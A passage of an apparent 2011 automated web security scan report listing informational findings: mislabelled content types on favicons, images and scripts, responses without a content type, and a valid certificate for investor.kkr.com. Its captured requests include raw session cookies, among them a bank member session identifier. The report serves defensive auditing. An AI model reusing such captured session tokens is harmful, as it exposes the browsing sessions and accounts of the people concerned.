GET /adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/post&posall=XXL,TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Frame6A,Left2,Left3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Mergers+&+Acquisitions;Investment+Banking;I+PO;I.P.O.s;IPOs;Offerings;Private+Equity;Hedge+Funds;Venture+Capital;Legal;The+New+York+Times;Andrew+Ross+Sorkin;Andrew+Sorkin;+DealBook;deal+maker;Wall+street;wall+st.;Goldman+Sachs;Goldman+Sachs+Group;Morgan+Stanley;Morgan+Stanley+Smith+Barney;Citigroup;Citibank;Citi;Citicorp;Bank+of+America;Bank+of+America+Merrill+Lynch;Merrill+Lynch;Merrill;JPMorgan+Chase;J.P.+Morgan+Chase;J.+P.+Morgan+Chase;J.P.+Morgan+Securities;Bear+Stearns;Lehman+Brothers;Credit+Suisse;Credit+Suisse+First+Boston;CSFB;UBS;Deutsche+Bank;SAC+Capital;S.A.C.+Capital;Stevie+Cohen;Henry+Kravis;KKR;Kohlberg+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;animal-kingdom;boston-celtics;carl-pascarella;churchill-downs;david-bonderman;detroit-pistons;kentucky-derby;new-york-mets-org;platinum-equity;private-equity;retailleisure;steven-a-cohen;team-valor-international;tom-gores;tpgtexas-pacific-group HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; ebNewBandWidth_.www.nytimes.com=2534%3A1304378197383; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; _chartbeat2=sb4nmgc9whf8empd

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-type: text/html
Set-cookie: adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 22704


var adxads = new Array(11);

adxads[0] = "<img src=\"http://graphics8.nytimes.com/ads/blank.gif\">";
adxpos_Bottom7 = 0;

adxads[1] = "<script> function safeMultiTrack() { if ('dcsMultiTrack' in wind
...[SNIP]...

28.53. http://www.privateequityinfo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.privateequityinfo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:36 GMT
ETag: "43803d-e37-4964bff40e800"
Accept-Ranges: bytes
Content-Length: 3639
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................K...JJJ.....www.%%%.....*\u.....bbb.............:::.........J....#-...........-.ooo.*Uj.AAA.[[[................. .
...[SNIP]...

28.54. http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.privateequityinfo.com
Path:   /grfx/grfx2009/topmenu/shadow.jpg

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /grfx/grfx2009/topmenu/shadow.jpg HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:41 GMT
ETag: "1120005-128-4964bff8d3340"
Accept-Ranges: bytes
Content-Length: 296
Content-Type: image/jpeg

......JFIF.....H.H.....C..............................................        ....................C............
.
......................................................................................    .
...[SNIP]...

28.55. http://www.tuckerellis.com/tucker-favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /tucker-favicon.ico HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................j...o...l...........q...........w...j........&..j...........l.......l.......n...w........'..p
......l....O..l...r..h...............w
...[SNIP]...

28.56. https://www.usaa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.usaa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MemberGlobalSession=2:1002:4NZ4JENKZGDZY5ESDUSV; dcenv=DCITC

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Last-Modified: Wed, 19 Apr 2006 15:05:12 GMT
ETag: "15002c-876-fb79ba00"
Accept-Ranges: bytes
Content-Length: 2166
Content-Type: text/plain
Cache-Control: max-age=73169
Expires: Fri, 13 May 2011 07:43:50 GMT
Date: Thu, 12 May 2011 11:24:21 GMT
Connection: keep-alive

...... ..........&...........h.......(... ...@............................................................................................................................!....33.33.2!31"3....0.2..133
...[SNIP]...

28.57. https://www.wellsfargo.com/img/theprivatebank/apa.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /img/theprivatebank/apa.jpg

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/theprivatebank/apa.jpg HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/theprivatebank/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:27 GMT
Content-length: 7891
Content-type: image/jpeg
Last-modified: Sat, 13 Nov 2010 13:36:14 GMT
Etag: "1ed3-4cde944e"
Accept-ranges: bytes

GIF89aW.........lmp.w NOR.a;............}~..........Z[^......!.......,....W......p.I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~....r....;..y....T
...;..y..
U...
...[SNIP]...

28.58. http://www.wolfgreenfield.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.59. http://www.wolfgreenfield.com/javascript/c_smartmenus.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /javascript/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:05 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:31 GMT
ETag: "1e985d8-45d5-68575ec0"
Accept-Ranges: bytes
Content-Length: 17877
Connection: close
Content-Type: application/x-javascript

/*
========================================
SmartMenus v6.0.2 Script Core
Commercial License No.: UN-LICENSED
========================================
Please note: THIS IS NOT FREE SOFTWARE.
Licen
...[SNIP]...

29. Content type is not specified
There are 4 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


29.1. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:01 GMT
Pragma: no-cache
Content-Length: 4401
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

29.2. http://lfov.net/webrecorder/g/chimera.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=6839ce2a-0bad-40a6-a65f-c621a7d51f1a; Expires=Fri, 11-May-2012 12:10:11 GMT
Content-Length: 51
Date: Thu, 12 May 2011 12:10:11 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='6839ce2a-0bad-40a6-a65f-c621a7d51f1a';


29.3. http://lfov.net/webrecorder/js/listen.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Thu, 21 Apr 2011 03:32:43 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Thu, 19 May 2011 08:10:09 GMT
Date: Thu, 12 May 2011 12:10:09 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...

29.4. https://webmail-us.mimecast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail-us.mimecast.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1297546324000"
Last-Modified: Sat, 12 Feb 2011 21:32:04 GMT
Content-Length: 1406
Date: Thu, 12 May 2011 12:34:18 GMT

..............h.......(....... ...................................................oVE..fJ.........[F6.....'
....y.....vbP.[>$.\C...}m.........fJ7.E...:.......~dQ.....;...jF..2...3...N*................
...[SNIP]...

30. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  INVESTOR.KKR.COM
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Feb 17 18:00:00 CST 2011
Valid to:  Sun Feb 17 17:59:59 CST 2013

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
